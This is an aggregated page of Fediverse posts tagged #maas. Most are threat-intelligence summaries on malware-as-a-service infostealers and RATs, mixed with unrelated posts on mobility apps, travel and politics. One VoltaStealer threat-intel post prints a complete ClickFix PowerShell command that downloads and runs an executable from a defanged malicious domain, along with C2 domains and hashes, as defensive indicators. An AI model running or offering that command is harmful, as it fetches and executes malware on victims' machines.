home.social

#maas — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #maas, aggregated by home.social.

fetched live
  1. WeedHack Malware Persists, Adapts After Infrastructure Takedown

    Even after its infrastructure was taken down, the sneaky WeedHack malware managed to adapt and persist, continuing to infect Minecraft players with its malicious code. McAfee researchers tracked over 6,300 attempts to access the malware in August, showing its resilience as a malware-as-a-service operation.

    osintsights.com/weedhack-malwa

    #MalwareOperations #Weedhack #Minecraft #Maas #EmergingThreats

  2. Distinct Clusters Target Individuals of Interest to Russia

    Three distinct suspected Russian cyber espionage threat clusters—UNC6293, UNC7005, and UNC5976—are abusing legitimate authentication flows to target individuals in academia, aerospace, defense, governments, and think tanks across Europe and the United States. These groups conduct sophisticated phishing campaigns using app password phishing, OAuth phishing, device code phishing, and malware deployment. UNC6293 and UNC7005 are assessed with moderate confidence to be initial access clusters linked to ICE RELIC (formerly APT29), while UNC5976 appears distinct. Operations leverage social engineering through fake diplomatic invitations, conference registrations, and file sharing pages. UNC7005 was tied to hospitality captive portal redirects and deployed MaaS infostealers including VIDAR and ATOMIC. These actors abuse legitimate authentication mechanisms including Google OAuth, Microsoft device codes, and WhatsApp device linking to compromise personal accounts, making detection challenging for organizations.

    Pulse ID: 6a8734bac622f3c7b2d9a633
    Pulse Link: otx.alienvault.com/pulse/6a873
    Pulse Author: AlienVault
    Created: 2026-08-20 17:09:14

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #APT29 #CyberSecurity #Espionage #Europe #FileSharing #Google #Government #Hospital #InfoSec #InfoStealer #MaaS #Malware #Microsoft #OTX #OpenThreatExchange #Password #Phishing #RAT #Russia #SMS #SocialEngineering #UnitedStates #Vidar #WhatsApp #Word #bot #AlienVault

  3. From ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel

    Pulse ID: 6a86849e09a4cdd23ea741ea
    Pulse Link: otx.alienvault.com/pulse/6a868
    Pulse Author: Tr1sa111
    Created: 2026-08-20 04:37:50

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CyberSecurity #InfoSec #MaaS #OTX #OpenThreatExchange #RAT #Windows #bot #Tr1sa111

  4. From ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel

    A new ClickFix campaign targets Windows users with a NodeJS-based infostealer delivered via malicious MSI installers. This highly adaptable remote access Trojan minimizes forensic footprints through dynamic capability loading, with core stealing modules and communication protocols delivered in-memory only after C2 connection. The malware routes gRPC streaming traffic over Tor network for persistent, masked bidirectional channels. An operational security failure exposed server-side admin panel protocol definitions, revealing a malware-as-a-service backend designed to manage multiple operators and automate cryptocurrency asset tracking. The modular architecture delivers malicious logic dynamically as strings executed in-memory, bypassing static signature detection while supporting full RAT functionality including shell command execution and wallet tracking.

    Pulse ID: 6a8592950ee0e8d05fc1bec9
    Pulse Link: otx.alienvault.com/pulse/6a859
    Pulse Author: AlienVault
    Created: 2026-08-19 11:25:09

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CyberSecurity #InfoSec #InfoStealer #MaaS #Malware #MalwareAsAService #Nim #OTX #OpenThreatExchange #RAT #RPC #RemoteAccessTrojan #Trojan #Windows #bot #cryptocurrency #AlienVault

  5. Bon et qu'est-ce que l'#ADEME identifie comme recommandation ?

    1. Une complémentarité #multimodale avec #transportsEnCommun et #vélo.

    Ils mentionnent les applis #MaaS mais ne creusent pas. Il faudrait pourtant une boussole claire là dessus pour les #autoritésOrganisatricesDesMobilités.

    2. Des questions d'organisation de l'action publique

    🧵 23

    #AOM
    #MobilityAsAService #MobilitéCommeService

  6. Il progetto MaaS a Roma registra una crescita nell’utilizzo del trasporto pubblico e degli spostamenti intermodali grazie alla tariffa digitale unica. I dati indicano un aumento del 6% degli utenti del trasporto pubblico e del 19% dei viaggi combinati tra diversi mezzi.
    #MaaS #Mobilità

    odisseaquotidiana.com/2026/07/

    @[email protected] @[email protected]

  7. #Holiday day 13: Walked along the river Meuse from Dinant to the Écluse de Houx and back, a round trip of about 10 km. I expected to see some cargo boats on the river, but only saw some pleasure craft.
    #Dinant #Meuse #Maas

  8. wacoca.com/news/2883998/ 茨城県、フィジカルAI産業創出コンソーシアムのキックオフイベント「IBARAKI PHYSICAL AI SUMMIT 2026」を7/28開催 | ロボスタ #5G #6G #6G通信 #AI #ibaraki #IoT #MaaS #ドローン #モバイル通信 #ロボット #自動運転 #茨城 #茨城県 #量子

  9. Ich bin im Nachbarland angekommen. Vorhin habe ich mich etwas an der Maas abgekühlt.
    Noch besser geht das Abkühlen in der kleinen Ferienwohnung: mit Klimaanlage

    #Maas #Urlaub #Niederlande

  10. 👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

    While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

    The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

    What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
    🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
    🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
    🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
    🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
    🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

    In other words: vapor no more. 💨

    ⛔ VoltaStealer C2:
    usevolta[.]su

    ⛔ VoltaStealer Payloads (SHA256):
    2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
    253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

    ⛔ ClickFix PowerShell command (Not VoltaStealer):
    command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

    ⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
    6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

    ⛔ ClickFix actor domains:
    comalign[.]pro
    zorivian[.]pro
    nexalora[.]pro
    kovraxis[.]com
    mevrio[.]com
    krebbo[.]world
    wobblify[.]cfd
    yovu[.]world
    glimmerix[.]pro
    launcherpatch[.]com
    grembix[.]cfd
    wumlo[.]shop
    plonkert[.]cfd
    volpo[.]cfd
    fleepax[.]cfd
    zixlo[.]cfd
    quobnar[.]world
    riotmourner[.]pro
    youfound[.]fun

    Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

  11. @annyhartmann
    SPD macht SPD-Dinge. Die Partei der Tauben- und Kaninchenzüchter. Glaub' doch bitte nicht dass die irgendwas gegen Überwachung, Anpassungsdruck oder Social Score hat.
    #SPD #Verraten #Maas #Faeser

  12. OnyxC2 – infostealer “oferowany” jako profesjonalne narzędzie klasy enterprise

    Jak donoszą badacze z Blackfog na początku 2026 r. zaobserwowano nowe zagrożenie – infostealer o nazwie OnyxC2. To co go wyróżnia to przede wszystkim profesjonalny model dystrybucji. Jest oferowany na forach dla cyberprzestępców. Za równowartość $250 miesięcznie potencjalni nabywcy zyskują potężne narzędzie, pozwalające na wykradanie danych uwierzytelniających z przeglądarek, menadżerów...

    #WBiegu #Infostealer #Maas #Malware #Onyxc2 #RAT

    sekurak.pl/onyxc2-infostealer-